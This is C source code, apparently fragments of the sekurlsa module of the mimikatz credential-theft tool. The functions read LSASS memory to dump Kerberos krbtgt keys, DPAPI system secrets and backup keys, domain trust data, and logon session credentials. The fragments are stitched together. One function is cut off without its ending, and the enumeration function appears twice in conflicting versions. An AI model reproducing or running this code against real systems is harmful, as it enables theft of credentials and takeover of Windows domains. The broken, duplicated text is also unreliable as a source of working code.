NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[]) { NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); LONG l = 0; DUAL_KRBTGT dualKrbtgt = {NULL, NULL}; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {&dualKrbtgt, &hLocalMemory}; if(NT_SUCCESS(status)) { if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent) { if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, SecDataReferences, ARRAYSIZE(SecDataReferences), &aLsass.address, NULL, NULL, &l)) { aLsass.address = (PBYTE) aLsass.address + sizeof(PVOID) * l; if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(DUAL_KRBTGT))) { kuhl_m_sekurlsa_krbtgt_keys(dualKrbtgt.krbtgt_current, L"Current"); kuhl_m_sekurlsa_krbtgt_keys(dualKrbtgt.krbtgt_previous, L"Previous"); } } } else PRINT_ERROR(L"KDC service not in LSASS memory\n"); } return status; }
NTSTATUS kuhl_m_sekurlsa_dpapi_system(int argc, wchar_t * argv[]) { NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, aLocal = {NULL, &hLocalMemory}; PKUHL_M_SEKURLSA_PACKAGE pPackage = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package; PVOID pBool = NULL, pShaSystem = NULL, pShaUser = NULL; BOOL fSystemCredsInitialized; BYTE origInit, rgbSystemCredMachine[SHA_DIGEST_LENGTH], rgbSystemCredUser[SHA_DIGEST_LENGTH]; if(NT_SUCCESS(status)) { if(pPackage->Module.isPresent) { origInit = pPackage->Module.isInit; if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &pPackage->Module, SysCredReferences, ARRAYSIZE(SysCredReferences), &pBool, &pShaSystem, &pShaUser, NULL)) { pPackage->Module.isInit = origInit; // trick to use same packages as normal module. aLocal.address = &fSystemCredsInitialized; aLsass.address = pBool; if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(fSystemCredsInitialized))) { if(fSystemCredsInitialized) { kprintf(L"DPAPI_SYSTEM\n"); aLocal.address = &rgbSystemCredMachine; aLsass.address = pShaSystem; if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(rgbSystemCredMachine))) { aLocal.address = &rgbSystemCredUser; aLsass.address = pShaUser; if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(rgbSystemCredUser))) { kprintf(L"full: "); kull_m_string_wprintf_hex(rgbSystemCredMachine, sizeof(rgbSystemCredMachine), 0); kull_m_string_wprintf_hex(rgbSystemCredUser, sizeof(rgbSystemCredUser), 0); kprintf(L"\nm/u : "); kull_m_string_wprintf_hex(rgbSystemCredMachine, sizeof(rgbSystemCredMachine), 0); kprintf(L" / "); kull_m_string_wprintf_hex(rgbSystemCredUser, sizeof(rgbSystemCredUser), 0); kprintf(L"\n"); } } } else PRINT_ERROR(L"Not initialized!\n"); } } } else PRINT_ERROR(L"DPAPI service not in LSASS memory\n"); } return status; }
NTSTATUS kuhl_m_sekurlsa_bkeys(int argc, wchar_t * argv[]) { NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); PKUHL_M_SEKURLSA_LIB pLib; BOOL export = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL); if(NT_SUCCESS(status)) { pLib = (cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package.Module : &kuhl_m_sekurlsa_dpapi_lsa_package.Module; if(pLib->isPresent) { kprintf(L"\nCurrent prefered key: "); kuhl_m_sekurlsa_bkey(&cLsass, pLib, BackupKeyReferences, ARRAYSIZE(BackupKeyReferences), export); kprintf(L"\nCompatibility prefered key: "); kuhl_m_sekurlsa_bkey(&cLsass, pLib, BackupKeyReferencesCompat, ARRAYSIZE(BackupKeyReferencesCompat), export); } }
NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[]) { NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); PVOID buffer; KDC_DOMAIN_INFO domainInfo; KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass.hLsassMem}, data = {&buffer, &hBuffer}, aBuffer = {&domainInfo, &hBuffer}; if(cLsass.osContext.BuildNumber >= KULL_M_WIN_BUILD_7) { if(NT_SUCCESS(status)) { if(kuhl_m_sekurlsa_kdcsvc_package.Module.isPresent) { if(kuhl_m_sekurlsa_utils_search_generic(&cLsass, &kuhl_m_sekurlsa_kdcsvc_package.Module, DomainListReferences, ARRAYSIZE(DomainListReferences), &aLsass.address, NULL, NULL, NULL)) { if(kull_m_memory_copy(&data, &aLsass, sizeof(PVOID))) { data.address = buffer; data.hMemory = cLsass.hLsassMem; while(data.address != aLsass.address) { if(kull_m_memory_copy(&aBuffer, &data, sizeof(KDC_DOMAIN_INFO))) { kuhl_m_sekurlsa_trust_domaininfo(&domainInfo); data.address = domainInfo.list.Flink; } else break; } } } } else PRINT_ERROR(L"KDC service not in LSASS memory\n"); } } else PRINT_ERROR(L"Only for >= 2008r2\n"); return status; }
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData) { KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData; ULONG nbListes = 1, i; PVOID pStruct; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory}; BOOL retCallback = TRUE; const KUHL_M_SEKURLSA_ENUM_HELPER * helper; NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); if(NT_SUCCESS(status)) { sessionData.cLsass = &cLsass; sessionData.lsassLocalHelper = lsassLocalHelper; if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_2K3) helper = &lsassEnumHelpers[0]; else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_VISTA) helper = &lsassEnumHelpers[1]; else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_7) helper = &lsassEnumHelpers[2]; else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8) helper = &lsassEnumHelpers[3]; else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) helper = &lsassEnumHelpers[5]; else helper = &lsassEnumHelpers[6]; if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000)) helper++; // yeah, really, I do that =) securityStruct.hMemory = cLsass.hLsassMem; if(securityStruct.address = LogonSessionListCount) kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG)); for(i = 0; i < nbListes; i++) { securityStruct.address = &LogonSessionList[i]; data.address = &pStruct; data.hMemory = &hLocalMemory; if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct)) { if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID))) { data.address = pStruct; data.hMemory = securityStruct.hMemory; while((data.address != securityStruct.address) && retCallback) { if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct)) { sessionData.LogonId = (PLUID) ((PBYTE) aBuffer.address + helper->offsetToLuid); sessionData.LogonType = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToLogonType)); sessionData.Session = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToSession)); sessionData.UserName = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername); sessionData.LogonDomain = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain); sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials); sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid); sessionData.pCredentialManager = *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentialManager); sessionData.LogonTime = *((PFILETIME) ((PBYTE) aBuffer.address + helper->offsetToLogonTime)); sessionData.LogonServer = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToLogonServer); kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem); kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem); kull_m_string_getUnicodeString(sessionData.LogonServer, cLsass.hLsassMem); kull_m_string_getSid(&sessionData.pSid, cLsass.hLsassMem); retCallback = callback(&sessionData, pOptionalData); if(sessionData.UserName->Buffer) LocalFree(sessionData.UserName->Buffer); if(sessionData.LogonDomain->Buffer) LocalFree(sessionData.LogonDomain->Buffer); if(sessionData.LogonServer->Buffer) LocalFree(sessionData.LogonServer->Buffer); if(sessionData.pSid) LocalFree(sessionData.pSid); data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink; } else break; } } LocalFree(aBuffer.address); } } } return status; }
NTSTATUS kuhl_m_sekurlsa_strings(int argc, wchar_t * argv[]) { if(NT_SUCCESS(kuhl_m_sekurlsa_acquireLSA())) kull_m_process_getMemoryInformations(cLsass.hLsassMem, kuhl_m_sekurlsa_enum_range, (PVOID) cLsass.hLsassMem); return STATUS_SUCCESS; }
NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData) { KIWI_BASIC_SECURITY_LOGON_SESSION_DATA sessionData; ULONG nbListes = 0, i; PVOID pStruct; KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}; KULL_M_MEMORY_ADDRESS securityStruct, data = {&nbListes, &hLocalMemory}, aBuffer = {NULL, &hLocalMemory}; BOOL retCallback = TRUE; const KUHL_M_SEKURLSA_ENUM_HELPER * helper; NTSTATUS status = kuhl_m_sekurlsa_acquireLSA(); if(NT_SUCCESS(status)) { sessionData.cLsass = &cLsass; sessionData.lsassLocalHelper = lsassLocalHelper; if(cLsass.osContext.MajorVersion < 6) helper = &lsassEnumHelpers[0]; else if(cLsass.osContext.MinorVersion < 2) helper = &lsassEnumHelpers[1]; else if(cLsass.osContext.MinorVersion < 3) helper = &lsassEnumHelpers[2]; else helper = &lsassEnumHelpers[3]; securityStruct.hMemory = cLsass.hLsassMem; securityStruct.address = LogonSessionListCount; if(securityStruct.address) kull_m_memory_copy(&data, &securityStruct, sizeof(ULONG)); else *(PULONG) data.address = 1; for(i = 0; i < nbListes; i++) { securityStruct.address = &LogonSessionList[i]; data.address = &pStruct; data.hMemory = &hLocalMemory; if(aBuffer.address = LocalAlloc(LPTR, helper->tailleStruct)) { if(kull_m_memory_copy(&data, &securityStruct, sizeof(PVOID))) { data.address = pStruct; data.hMemory = securityStruct.hMemory; while((data.address != securityStruct.address) && retCallback) { if(kull_m_memory_copy(&aBuffer, &data, helper->tailleStruct)) { sessionData.LogonId = (PLUID) ((PBYTE) aBuffer.address + helper->offsetToLuid); sessionData.LogonType = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToLogonType)); sessionData.Session = *((PULONG) ((PBYTE) aBuffer.address + helper->offsetToSession)); sessionData.UserName = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToUsername); sessionData.LogonDomain = (PUNICODE_STRING) ((PBYTE) aBuffer.address + helper->offsetToDomain); sessionData.pCredentials= *(PVOID *) ((PBYTE) aBuffer.address + helper->offsetToCredentials); sessionData.pSid = *(PSID *) ((PBYTE) aBuffer.address + helper->offsetToPSid); kull_m_string_getUnicodeString(sessionData.UserName, cLsass.hLsassMem); kull_m_string_getUnicodeString(sessionData.LogonDomain, cLsass.hLsassMem); kuhl_m_sekurlsa_utils_getSid(&sessionData.pSid, cLsass.hLsassMem); retCallback = callback(&sessionData, pOptionalData); LocalFree(sessionData.UserName->Buffer); LocalFree(sessionData.LogonDomain->Buffer); LocalFree(sessionData.pSid); data.address = ((PLIST_ENTRY) (aBuffer.address))->Flink; } else break; } } LocalFree(aBuffer.address); } } } return status; }